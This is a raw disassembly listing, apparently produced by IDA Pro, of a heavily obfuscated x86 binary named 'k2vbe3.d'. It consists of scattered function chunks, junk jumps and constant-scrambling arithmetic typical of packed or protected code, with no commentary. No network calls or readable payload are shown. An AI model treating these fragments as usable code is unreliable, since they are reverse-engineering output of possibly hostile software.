loc_4599C5:				; CODE XREF: sub_4529E2:loc_443881j
		call	sub_44FBB2

loc_4599CA:				; CODE XREF: k2vbe3.d:00454B75j
		jmp	loc_458DA4
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F04

loc_4599CF:				; CODE XREF: sub_450F04+Aj
		jmp	loc_43E9EF
; END OF FUNCTION CHUNK	FOR sub_450F04
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440B5

loc_4599D4:				; CODE XREF: sub_4440B5:loc_453E29j
		add	edx, 0C141A0B4h
		or	edx, 0E1A5BA51h

loc_4599E0:				; CODE XREF: sub_443FC1-6D6Bj
		add	edx, 2454372h
		xchg	edx, [esp+8+var_8]
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_4440B5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_390. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4599EF:				; DATA XREF: sub_45A309:loc_45710Eo
		mov	ebp, esp
		push	ecx
		cmp	ds:dword_43FA7C, 0
		jnz	loc_442134
		jmp	loc_452B30
; ---------------------------------------------------------------------------

loc_459A04:				; CODE XREF: k2vbe3.d:loc_456F26j
		xor	eax, 57FCF33Eh
		call	sub_4553CC
		push	edi
		call	sub_45282D
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_459A15:				; CODE XREF: sub_43D823+18380j
		jmp	nullsub_335
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------

loc_459A1A:				; CODE XREF: k2vbe3.d:0043D178j
		jmp	loc_44DE7C
; ---------------------------------------------------------------------------

loc_459A1F:				; CODE XREF: k2vbe3.d:0043D101j
		jb	loc_44C777
; START	OF FUNCTION CHUNK FOR sub_44E503

loc_459A25:				; CODE XREF: sub_44E503+AF92j
		jmp	loc_45A8FB
; END OF FUNCTION CHUNK	FOR sub_44E503
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D45F

loc_459A2A:				; CODE XREF: sub_43D45F+D3A9j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_43D45F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C1C5

loc_459A2F:				; CODE XREF: sub_43C1C5+Dj
		jmp	loc_452514
; END OF FUNCTION CHUNK	FOR sub_43C1C5
; ---------------------------------------------------------------------------
		xor	ebp, ebx
		shl	ebx, 8
		popf
		shl	esi, 19h
		jno	loc_43E2CA
		jmp	loc_44C777
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EFDA

loc_459A48:				; CODE XREF: sub_43EFDA+15924j
		add	esi, eax
		pop	eax
		mov	[esi], eax
		pop	esi
		jmp	loc_44E5D1
; END OF FUNCTION CHUNK	FOR sub_43EFDA

; =============== S U B	R O U T	I N E =======================================



sub_459A53	proc near		; CODE XREF: sub_440D6A+17184j
		add	esp, 0FFFFFFD0h
		push	offset sub_458DAF
		jmp	nullsub_338
sub_459A53	endp


; =============== S U B	R O U T	I N E =======================================



sub_459A60	proc near		; CODE XREF: sub_4574D4j
					; DATA XREF: sub_45A323-2E59o

; FUNCTION CHUNK AT 0044497A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444DF7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454D4C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457788 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458D64 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004592C6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459C54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A01A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B110 SIZE 0000000B BYTES

		cmp	al, 0A4h
		jz	loc_457793

loc_459A68:				; CODE XREF: k2vbe3.d:00451044j
		jmp	loc_44497A
sub_459A60	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_459A6D:				; CODE XREF: k2vbe3.d:loc_451266j
		add	esi, 1673D76h
		xchg	esi, [esp]
		jmp	sub_453347
; ---------------------------------------------------------------------------

loc_459A7B:				; CODE XREF: k2vbe3.d:0044ECD6j
		jz	loc_43FB4F

loc_459A81:				; CODE XREF: k2vbe3.d:0044ECC3j
		add	edx, 1AF65CE5h
		push	offset sub_44A20D
		jmp	loc_43E9DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E470

loc_459A91:				; CODE XREF: sub_43E470+8F85j
		mov	al, 1
		call	edx
		pop	ebp
		xor	eax, eax
		push	esi
		jmp	loc_4442D1
; END OF FUNCTION CHUNK	FOR sub_43E470

; =============== S U B	R O U T	I N E =======================================



sub_459A9E	proc near		; CODE XREF: k2vbe3.d:loc_447646j
					; sub_45A323:loc_44A76Ap

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044E402 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	ecx, 0F5B282CCh
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_44E402
sub_459A9E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446478

loc_459AB0:				; CODE XREF: sub_446478+1058Dj
					; sub_446478+1059Bj
		sub	ebx, 3295AAA0h
		and	ebx, ds:4000EEh
		or	ebx, 1930232Bh
		jns	loc_442A80
; END OF FUNCTION CHUNK	FOR sub_446478
; START	OF FUNCTION CHUNK FOR sub_455762

loc_459AC8:				; CODE XREF: sub_455762+7j
		jmp	sub_44ED3C
; END OF FUNCTION CHUNK	FOR sub_455762
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4437FB

loc_459ACD:				; CODE XREF: sub_4437FB+Cj
		jmp	loc_45A02E
; END OF FUNCTION CHUNK	FOR sub_4437FB

; =============== S U B	R O U T	I N E =======================================



sub_459AD2	proc near		; CODE XREF: sub_453DF1j
					; DATA XREF: sub_44E00F:loc_453DE7o
		mov	byte ptr [eax],	0C3h
		jmp	sub_44803D
sub_459AD2	endp


; =============== S U B	R O U T	I N E =======================================



sub_459ADA	proc near		; CODE XREF: sub_410A9C+45p
					; sub_459ADA+5j
					; DATA XREF: ...
		call	sub_459AEA
		jmp	ds:off_41E0A8
sub_459ADA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B710

loc_459AE5:				; CODE XREF: sub_45B710+7j
		jmp	loc_44C8E4
; END OF FUNCTION CHUNK	FOR sub_45B710

; =============== S U B	R O U T	I N E =======================================



sub_459AEA	proc near		; CODE XREF: k2vbe3.d:loc_44A082j
					; sub_44600A:loc_44EE50j ...

; FUNCTION CHUNK AT 0044CEF4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045172A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453EC0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00458FB5 SIZE 0000000D BYTES

		pop	edx
		jno	loc_458FB5
		mov	eax, [esp+0]
		push	eax
		jmp	loc_45172A
sub_459AEA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F37

loc_459AFA:				; CODE XREF: sub_458F37+Dj
		jz	loc_44266B
		jmp	loc_457CF1
; END OF FUNCTION CHUNK	FOR sub_458F37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45890F

loc_459B05:				; CODE XREF: sub_45890F-6D7Ej
		jp	sub_4511F7

loc_459B0B:				; CODE XREF: sub_45890F:loc_451B84j
		add	ecx, 59A74A8Ch
		add	edx, ecx
		pop	ecx
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_442CF5
; END OF FUNCTION CHUNK	FOR sub_45890F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DA2

loc_459B1F:				; CODE XREF: sub_449DA2:loc_45167Ej
		mov	eax, [eax]
		push	eax
		push	0
		push	10h
		call	sub_43FA2C
		push	edx
		jmp	loc_447C91
; END OF FUNCTION CHUNK	FOR sub_449DA2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_459B31:				; CODE XREF: sub_446E24:loc_44A029j
		jnz	loc_457830
		jmp	loc_43E47A
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4437D3

loc_459B3C:				; CODE XREF: sub_4437D3+9B65j
		js	loc_444B53

loc_459B42:				; CODE XREF: sub_4437D3:loc_453ADDj
		push	0
		push	0
		push	edx
		push	125401A3h
		pop	edx
		rol	edx, 15h
		sub	edx, 0A7C6C46h
		jmp	loc_44182C
; END OF FUNCTION CHUNK	FOR sub_4437D3
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447D2E

loc_459B5C:				; CODE XREF: sub_447D2E-6FBj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_447D2E

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_459B61	proc near		; CODE XREF: sub_4506C3-A281j
		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFF90h
		push	edi
		jmp	loc_455020
sub_459B61	endp

; ---------------------------------------------------------------------------
		mov	eax, 2D912001h
		push	edi
		push	998347A9h
		pop	edi
		add	edi, 54FF7D5Fh
		and	edi, 0F950DEDCh
		jmp	loc_443D92
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_459B8A:				; CODE XREF: sub_4424CF+11D77j
		mov	eax, [ebp+var_24]
		test	byte ptr [eax+1], 80h
		jnz	loc_44CE49
		jmp	loc_452377
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_459B9C:				; CODE XREF: sub_454E83-C9DFj
		push	eax
		push	ebx
		push	8DE05558h
		pop	ebx
		and	ebx, ds:4000EFh
		or	ebx, 136C46D3h
		add	ebx, 68590637h
		xchg	ebx, [esp+0]
		jmp	loc_4450BB
; END OF FUNCTION CHUNK	FOR sub_454E83
; ---------------------------------------------------------------------------

loc_459BBE:				; CODE XREF: k2vbe3.d:0044CFE3j
		jz	loc_44E1A6
; START	OF FUNCTION CHUNK FOR sub_4432B0

loc_459BC4:				; CODE XREF: sub_4432B0+16989j
		jmp	sub_450EE5
; END OF FUNCTION CHUNK	FOR sub_4432B0
; ---------------------------------------------------------------------------
		pop	eax
		jmp	loc_44E19F
; ---------------------------------------------------------------------------

loc_459BCF:				; CODE XREF: k2vbe3.d:loc_44F5C3j
		add	ecx, 7B37DFE6h
		call	sub_44298D
; START	OF FUNCTION CHUNK FOR sub_4478C6

loc_459BDA:				; CODE XREF: sub_4478C6+Ej
		jmp	nullsub_503
; END OF FUNCTION CHUNK	FOR sub_4478C6
; ---------------------------------------------------------------------------
		sub	eax, edi
		jmp	loc_459035
; ---------------------------------------------------------------------------

loc_459BE6:				; CODE XREF: k2vbe3.d:00452D9Ej
		xor	ebx, 0A585F813h
		test	ebx, 1
		jmp	loc_446DD7
; ---------------------------------------------------------------------------

locret_459BF7:				; CODE XREF: k2vbe3.d:loc_44463Aj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446645

loc_459BF8:				; CODE XREF: sub_446645+21j
		add	eax, ebp
		add	eax, 5AEEECBCh
		mov	eax, [eax]
		push	edx
		mov	edx, ebp
		jmp	loc_44608B
; END OF FUNCTION CHUNK	FOR sub_446645
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_459C0A:				; CODE XREF: sub_443FC1:loc_44D3D2j
		pop	edx
		xor	edx, 53980C82h
		add	edx, 30DA89F4h
		xor	edx, 0D1E134AAh
		jmp	loc_43E3D5
; END OF FUNCTION CHUNK	FOR sub_443FC1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_182. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_459C23:				; CODE XREF: k2vbe3.d:004557E2j
		jmp	loc_44AB61
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_459C28:				; CODE XREF: sub_444B3E+C722j
		jmp	loc_458E7A
; END OF FUNCTION CHUNK	FOR sub_444B3E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_330. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4432B0

loc_459C2E:				; CODE XREF: sub_4432B0-2F5Dj
		or	esi, 5FFC1A59h
		push	offset loc_4448C8
		jmp	loc_459BC4
; END OF FUNCTION CHUNK	FOR sub_4432B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453DB9

loc_459C3E:				; CODE XREF: sub_453DB9:loc_4491E1j
		mov	[ebp-4], eax
		mov	edx, [ebp-8]
		mov	eax, [ebp-4]
		call	sub_44B684
		mov	edx, [ebp-8]
		call	sub_44D910
; END OF FUNCTION CHUNK	FOR sub_453DB9
; START	OF FUNCTION CHUNK FOR sub_459A60

loc_459C54:				; CODE XREF: sub_459A60-4D0Ej
		jmp	loc_444DF7
; END OF FUNCTION CHUNK	FOR sub_459A60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF7B

loc_459C59:				; CODE XREF: sub_43FF7B+10j
		jmp	loc_45B31A
; END OF FUNCTION CHUNK	FOR sub_43FF7B
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_457E92
		jmp	loc_45547A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_459C6B:				; CODE XREF: sub_45A323+EEj
		push	0C4231F68h
		and	ebx, ebp
		jmp	loc_446765
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		test	ebx, edi
		jmp	loc_448812
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451759

loc_459C7E:				; CODE XREF: sub_451759:loc_45C1C4j
		xor	edx, 75C5E51h
		sub	edx, 5E3F6D65h
		rol	edx, 0Bh
		or	edx, 42634572h
		jmp	loc_45A167
; END OF FUNCTION CHUNK	FOR sub_451759
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4469E1

loc_459C98:				; CODE XREF: sub_4469E1-6422j
		sub	esi, ecx
		jl	loc_45B524

loc_459CA0:				; CODE XREF: sub_4469E1:loc_44DC4Fj
		call	sub_4436CE
		mov	edx, 0DD5E106Fh
		call	sub_45B20A
		push	eax
		ror	eax, 0Ah
		jmp	loc_44395B
; END OF FUNCTION CHUNK	FOR sub_4469E1
; ---------------------------------------------------------------------------

loc_459CB8:				; CODE XREF: k2vbe3.d:loc_44F350j
		jnz	loc_43D26F
		jz	loc_45A8FB
		jmp	loc_43D269
; ---------------------------------------------------------------------------

loc_459CC9:				; DATA XREF: sub_44B2D7-C821o
		push	0E9D73417h
		xchg	edi, [esp]
		mov	edx, edi
		pop	edi
		xor	edx, 3431C528h
		js	loc_44E125
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_459CE0:				; CODE XREF: sub_454E69:loc_43C79Cj
		dec	dword ptr [ebp-2Ch]
		jnz	loc_445079
		jmp	loc_450B2B
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_459CEE:				; CODE XREF: sub_456541:loc_456291j
		jz	loc_4514B8
		jmp	loc_4462A2
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------

loc_459CF9:				; CODE XREF: k2vbe3.d:0044BA34j
		and	eax, 2002E691h
		push	offset sub_43F888
		jmp	locret_43CD0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_459D09:				; CODE XREF: sub_44067C:loc_440408j
		jge	loc_44EE34
		rol	edx, 16h
		mov	ebx, eax
		jmp	loc_44EE27
; END OF FUNCTION CHUNK	FOR sub_44067C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452DD6

loc_459D19:				; CODE XREF: sub_452DD6+4C0j
		push	1EFF4319h
		pop	ecx
		xor	ecx, 73E7B86Bh
		cmp	ecx, 0BE176797h
		jmp	loc_44F5B8
; END OF FUNCTION CHUNK	FOR sub_452DD6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D31B

loc_459D30:				; CODE XREF: sub_43D31B:loc_45A7EDj
		push	offset loc_45A142
		jmp	nullsub_381
; END OF FUNCTION CHUNK	FOR sub_43D31B
; ---------------------------------------------------------------------------
		sub	edi, 9499B9CFh
		jmp	sub_445143
; ---------------------------------------------------------------------------

loc_459D45:				; DATA XREF: k2vbe3.d:0043C23Eo
		push	edx
		push	ecx
		push	0FA485A42h
		pop	ecx
		jmp	loc_456736
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_158. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448472

loc_459D53:				; CODE XREF: sub_448472+12C93j
		jmp	loc_449EA0
; END OF FUNCTION CHUNK	FOR sub_448472

; =============== S U B	R O U T	I N E =======================================



sub_459D58	proc near		; DATA XREF: k2vbe3.d:00441502o

; FUNCTION CHUNK AT 00442444 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00449918 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044C3F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454040 SIZE 00000005 BYTES

		push	0A31A1207h
		and	esi, ebx
		jmp	loc_454040
sub_459D58	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_459D64:				; CODE XREF: sub_443A30+FBD8j
		sbb	esi, 0E67A772Ch
		pushf
		sub	ecx, esi

loc_459D6D:				; CODE XREF: sub_447E07:loc_447F9Cj
		shr	ebp, 11h
		jmp	loc_43E987
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EDD

loc_459D75:				; CODE XREF: sub_454EDD:loc_454EE7j
		cmp	eax, [ebp-18h]
		jb	loc_455177
		jmp	loc_449F32
; END OF FUNCTION CHUNK	FOR sub_454EDD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_64. PRESS	KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_282. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EEA

loc_459D85:				; CODE XREF: sub_451EEA-13C16j
		jmp	loc_458214
; END OF FUNCTION CHUNK	FOR sub_451EEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_459D8A:				; CODE XREF: sub_440D7B+AA5j
					; sub_44B999-29FEj
		rol	eax, 13h
		push	eax
		call	sub_453347
		retn
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_459D94:				; CODE XREF: sub_44FF97+Bj
		jmp	loc_45AFD9
; END OF FUNCTION CHUNK	FOR sub_44FF97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AE1C

loc_459D99:				; CODE XREF: sub_44AE1C+19j
		jmp	nullsub_499
; END OF FUNCTION CHUNK	FOR sub_44AE1C
; ---------------------------------------------------------------------------

loc_459D9E:				; CODE XREF: k2vbe3.d:0043EEA4j
		jmp	nullsub_431

; =============== S U B	R O U T	I N E =======================================



sub_459DA3	proc near		; CODE XREF: sub_43E360+4p
					; sub_43F73B+4p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C357 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E222 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004412C4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00441616 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446AB6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004515B9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004545E3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00457189 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00457AE6 SIZE 0000000A BYTES

		jnb	sub_443246
		push	edx
		jmp	loc_446AB6
sub_459DA3	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_459DAF	proc near		; CODE XREF: sub_44E971:loc_43D851p
					; k2vbe3.d:0045C0A0j
		xchg	edx, [esp+0]
		pop	edx
		mov	eax, 120h
		call	sub_44ADEC
		push	offset sub_445373
		jmp	nullsub_346
sub_459DAF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408BD

loc_459DC7:				; CODE XREF: sub_4408BD+Dj
		mov	[eax], edx
		ror	ecx, 3

loc_459DCC:				; CODE XREF: k2vbe3.d:loc_457774j
		test	edi, 24D23B12h
		jmp	loc_44CF25
; END OF FUNCTION CHUNK	FOR sub_4408BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_459DD7:				; CODE XREF: sub_4426DF+57D4j
		push	edx
		push	offset loc_44E45E
		jmp	nullsub_347
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------

loc_459DE2:				; DATA XREF: sub_44881E-9BF8o
		mov	[ecx+0B8h], eax
		xchg	ebp, [esp]
		mov	ecx, ebp
		pop	ebp
		xor	eax, eax
		jmp	locret_445320
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_459DF5:				; CODE XREF: sub_44E0F6+6388j
		add	eax, 7D0h
		jmp	loc_45BD01
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------

loc_459DFF:				; CODE XREF: k2vbe3.d:loc_44A039j
					; k2vbe3.d:0044F442j
		jge	loc_449930
; START	OF FUNCTION CHUNK FOR sub_43E4CE

loc_459E05:				; CODE XREF: sub_43E4CE+1Cj
		jmp	loc_44D83A
; END OF FUNCTION CHUNK	FOR sub_43E4CE
; ---------------------------------------------------------------------------
		or	esi, 0C2C48C4Ch
		mov	ebx, esi
		jmp	loc_449930
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486D7

loc_459E17:				; CODE XREF: sub_4486D7+18EEj
		jz	nullsub_348
		jmp	loc_440ECD
; END OF FUNCTION CHUNK	FOR sub_4486D7

; =============== S U B	R O U T	I N E =======================================



sub_459E22	proc near		; DATA XREF: k2vbe3.d:00448EC0o
		add	edx, 0F73BB406h
		mov	[edx], eax
		xchg	edi, [esp+0]
		mov	edx, edi
		pop	edi
		mov	word ptr [ebp-6], 0FFFFh
		jmp	loc_45A594
sub_459E22	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F1A6

loc_459E3B:				; CODE XREF: sub_44F1A6+19j
		cmp	byte ptr [eax],	0F1h
		jnz	loc_446E1B
		jmp	loc_44F6D9
; END OF FUNCTION CHUNK	FOR sub_44F1A6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_447. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F1C

loc_459E4A:				; CODE XREF: sub_458F1C-945Bj
		jmp	loc_442242
; END OF FUNCTION CHUNK	FOR sub_458F1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455A4F

loc_459E4F:				; CODE XREF: sub_455A4F-8512j
		jmp	loc_45B0D5
; END OF FUNCTION CHUNK	FOR sub_455A4F
; ---------------------------------------------------------------------------

loc_459E54:				; CODE XREF: k2vbe3.d:loc_43CE0Aj
		pop	esi

loc_459E55:				; CODE XREF: k2vbe3.d:0043CD27j
		add	esi, 0EB396CCDh
		sub	esi, 0E6C7B845h
		cmp	esi, 22F6D9B6h
		jmp	loc_456D0B
; ---------------------------------------------------------------------------

loc_459E6C:				; CODE XREF: k2vbe3.d:0044425Dj
		jnp	loc_454B66
; START	OF FUNCTION CHUNK FOR sub_447594

loc_459E72:				; CODE XREF: sub_447594:loc_454B05j
		xor	ebx, 0D99BEB45h
		add	eax, ebx
		pop	ebx
		jmp	loc_44EF12
; END OF FUNCTION CHUNK	FOR sub_447594
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45000F

loc_459E80:				; CODE XREF: sub_45000Fj
		push	1D05404Bh
		add	eax, 4C87080Bh
		jmp	loc_451643
; END OF FUNCTION CHUNK	FOR sub_45000F
; ---------------------------------------------------------------------------

loc_459E90:				; CODE XREF: k2vbe3.d:loc_45996Aj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518D8

loc_459E91:				; CODE XREF: sub_4518D8+56BCj
		jmp	loc_43CDC1
; END OF FUNCTION CHUNK	FOR sub_4518D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_459E96:				; CODE XREF: sub_456666-7396j
		jmp	loc_44BBF5
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_459E9B:				; CODE XREF: sub_440C94+E2F0j
		jmp	loc_457AB5
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4517AE

loc_459EA0:				; CODE XREF: sub_4517AE-36FFj
		jmp	loc_45B6B1
; END OF FUNCTION CHUNK	FOR sub_4517AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BEA

loc_459EA5:				; CODE XREF: sub_455BEA-82E0j
		jmp	loc_455E92
; END OF FUNCTION CHUNK	FOR sub_455BEA
; ---------------------------------------------------------------------------

loc_459EAA:				; CODE XREF: k2vbe3.d:0044CC71j
		jns	loc_44627C

; =============== S U B	R O U T	I N E =======================================



sub_459EB0	proc near		; CODE XREF: sub_457D4B-8043p
		xchg	eax, [esp+0]
		pop	eax
		mov	[ecx], eax
		pop	ecx
		push	offset sub_447EB8
		jmp	nullsub_352
sub_459EB0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_459EC1:				; CODE XREF: sub_43DFE1:loc_442CFFj
		push	eax
		mov	eax, edx
		call	sub_445047
		mov	eax, [esp+0]
		call	sub_453347
		retn
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------

loc_459ED2:				; CODE XREF: k2vbe3.d:0045607Ej
		jmp	locret_44C399
; ---------------------------------------------------------------------------

loc_459ED7:				; CODE XREF: k2vbe3.d:0043CC5Fj
		jmp	locret_450314
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_459EDC:				; CODE XREF: sub_43DFE1-1C00j
		ror	eax, 0Fh
		push	edx
		jmp	loc_4585B3
; END OF FUNCTION CHUNK	FOR sub_43DFE1

; =============== S U B	R O U T	I N E =======================================



sub_459EE5	proc near		; CODE XREF: sub_44C1BD:loc_44F4E9p
					; k2vbe3.d:004589A5j

; FUNCTION CHUNK AT 0043E862 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A303 SIZE 00000006 BYTES

		xchg	esi, [esp+0]
		pop	esi
		rol	eax, 9
		push	edx
		jmp	loc_43E862
sub_459EE5	endp

; ---------------------------------------------------------------------------
		test	esi, 6EF4115Dh
		jmp	loc_444D75
; ---------------------------------------------------------------------------
		mov	edi, ebx
		test	edi, 0E653CE4h
		jmp	loc_444B8F
; ---------------------------------------------------------------------------

loc_459F0A:				; CODE XREF: k2vbe3.d:0043C2B8j
		mov	eax, 83ED7AACh
		push	ecx
		call	sub_45783B
; START	OF FUNCTION CHUNK FOR sub_43D786

loc_459F15:				; CODE XREF: sub_43D786+15F80j
		jmp	nullsub_353
; END OF FUNCTION CHUNK	FOR sub_43D786
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_459F1A:				; CODE XREF: sub_43CCD0+C6Dj
		jmp	loc_4465C3
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_459F1F:				; CODE XREF: k2vbe3.d:0044332Aj
					; sub_455C7A:loc_44431Bj
		jz	loc_459743
		jmp	loc_450B26
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_459F2A:				; CODE XREF: sub_43E135+16D81j
		jz	loc_4403AD
		jmp	loc_44B5D6
; END OF FUNCTION CHUNK	FOR sub_43E135
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FCA0

loc_459F35:				; CODE XREF: sub_43FCA0+13F38j
		pop	esi
		xor	esi, 1232F552h
		or	esi, 230D7F0Dh
		add	esi, 0CCF200B7h
		add	eax, esi
		pop	esi
		mov	eax, [eax]
		or	eax, eax
		jmp	loc_443A8B
; END OF FUNCTION CHUNK	FOR sub_43FCA0
; ---------------------------------------------------------------------------
		test	ebp, 8BB82429h
		jmp	loc_444167
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457B49

loc_459F5F:				; CODE XREF: sub_457B49-84BEj
		popf
		jmp	loc_448C2B
; END OF FUNCTION CHUNK	FOR sub_457B49
